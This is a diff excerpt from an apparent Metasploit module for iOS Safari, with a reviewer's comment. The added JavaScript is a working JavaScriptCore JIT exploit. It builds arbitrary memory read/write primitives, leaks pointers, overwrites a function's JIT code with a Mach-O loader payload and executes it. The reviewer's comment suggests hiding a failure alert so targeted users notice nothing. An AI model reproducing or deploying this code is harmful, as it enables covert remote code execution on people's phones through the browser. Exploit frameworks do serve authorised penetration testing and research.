modules/exploits/apple_ios/browser/safari_jit.rb

```diff
@@ -0,0 +1,549 @@
+        // 0     4         8
+        // | m_structure | m_butterfly |
+        var val = Number.prototype.valueOf.call(fakeNumber);
+
+        // get lower 32-bit of a 64-bit float, which is a structure pointer.
+        var _7pStructAddr = toHILO(val)[1];
+        log("struct addr: " + _7pStructAddr.toString(16));
+
+        // now we are going to use the structure to craft an object
+        // with properties allowing as read/write access to Uint32Array.
+
+        var aabb = new ArrayBuffer(0x20);
+
+        // Uint32Array is 0x18 bytes,
+        // + 0xc  m_impl
+        // + 0x10 m_storageLength
+        // + 0x14 m_storage
+        var u32rw = new Uint32Array(aabb, 4);
+
+        // Create a fake object with the structure we leaked before.
+        // So we can r/w to Uint32Array via out of line properties.
+        // The ool properties are placed before the butterfly header,
+        // so we point our fake object butterfly to Uint32Array + 0x28,
+        // to cover first 0x20 bytes via four out of line properties we added earlier
+        var objRW0Store = {p1:toF64(_7pStructAddr,  addrOf(u32rw) + 0x28), p2:1.1};
+
+        // materialize whatever we put in the first inline property as an object
+        var rw0Master = materialize(addrOf(objRW0Store) + 8);
+
+        // magic
+        var o = {p1: 1.1, p2: 1.1, p3: 1.1, p4: 1.1};
+        for (var i=0; i<8; i++) {
+          read32(addrOf(o));
+          write32(addrOf(o)+8, 0);
+        }
+
+        //testRW32();
+        // JSFunction->m_executable
+        var m_executable = read32(addrOf(exec)+0xc);
+
+        // m_executable->m_jitCodeForCall
+        var jitCodeForCall = read32(m_executable + 0x14) - 1;
+        log("jit code pointer: " + jitCodeForCall.toString(16));
+
+        // Get JSCell::destroy pointer, and pass it
+        // to the code we are going to execute as an argument
+        var n = new Number(1.1);
+        var struct = read32(addrOf(n));
+        // read methodTable
+        var classInfo = read32(struct + 0x20);
+        // read JSCell::destroy
+        var JSCell_destroy = read32(classInfo + 0x10);
+
+        log("JSCell_destroy: " + JSCell_destroy.toString(16));
+
+        // overwrite jit code of exec function
+        for (var i=0; i<loader.length; i++) {
+          var x = loader[i];
+          write32(jitCodeForCall+i*4, x);
+        }
+
+        // pass JSCell::destroy pointer and
+        // the macho file as arguments to our
+        // macho file loader, so it can get dylib cache slide
+        var nextBuf = read32(addrOf(macho) + 0x14);
+        // we pass parameters to the loader as a list of 32-bit words
+        // places right before the start
+        write32(jitCodeForCall-4, JSCell_destroy);
+        write32(jitCodeForCall-8, nextBuf);
+        log(nextBuf.toString(16));
+        //logFinalize();
+        // start our macho loader
+        exec(true);
+        alert("no go");
+        logFinalize();
```

Comment:
this has another alert box, i think this could be commented out as well to prevent popping up stuff to the user on failed exploit attempt